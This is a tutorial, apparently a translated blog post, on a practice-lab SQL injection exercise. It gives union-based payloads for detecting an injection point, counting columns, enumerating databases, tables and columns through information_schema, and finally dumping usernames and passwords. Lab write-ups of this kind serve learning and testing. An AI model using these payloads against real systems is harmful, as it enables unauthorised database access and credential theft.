Sql injection experiment one
A classic of youth will never be redeemed immediately
I am not afraid of being stupid, I am afraid that those who are stupid will work harder than me
Sql injection experiment one
In the case of a target drone, there must be an injection point when looking for a place with parameters.
Let’s start by judging the injection point
The payload is as follows:
// 数字型判断
?id=1 and 1=1
?id=1 and 1=2
// 字符型判断
?id=1' and '1'='1
?id=1' and '1'='2
Here is a digital judgment
When and 1=1, it returns to normal
and when 1=2, it returns to abnormal
This shows that there is an injection point here
After finding the injection point, we have to get the field length.
Here we need to use
order by 数字
It should be guessing, and the numbers need to be entered reasonably. I usually start with 1 and follow my feelings.
Here I tested it is <16, which is 1-15
After getting the field length, we now need to get the database name, but before that we need to query which ones are displayed on the front end, here we need to use the joint query.
union select 查询到的字段
These queries are displayed on the front-end, just replace them for database query
• database() returns the name of the database used by the current website
• user() will return the username of the current query
• version() Get the current database version
• @@version_compile_os Get the current operating system
• @@datadir Get the current database path
The current database is cms
Because in some cases, the problem we get is that we need to get other databases to get the flag, and we also need to get other database names
group_concat(schema_name) from information_schema.schemata
Then you need to explode the current database table
group_concat(table_name) from information_schema.tables where table_schema='cms'
Now you need to guess the field,
guess the table cms_users
group_concat(column_name) from information_schema.columns where table_name='cms_user'
The last step is to explode the content
Of course, you can also query a single table
to sum up
order by –+ 判断字段数目
union select –+ 联合查询收集信息
id=1′ and 1=2 UNION SELECT 1,2,database() –+ 查询当前数据库
id=1′ and 1=2 UNION SELECT 1,2,group_concat(schema_name) from information_schema.schemata –+查询所有数据库
id=1′ and 1=2 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() –+ 查询表名
id=1′ and 1=2 UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name=’users’ –+ 查询列名
id=1′ and 1=2 UNION SELECT 1,2,group_concat(id,username,password) from users –+ 查询字段值
Move forward with weight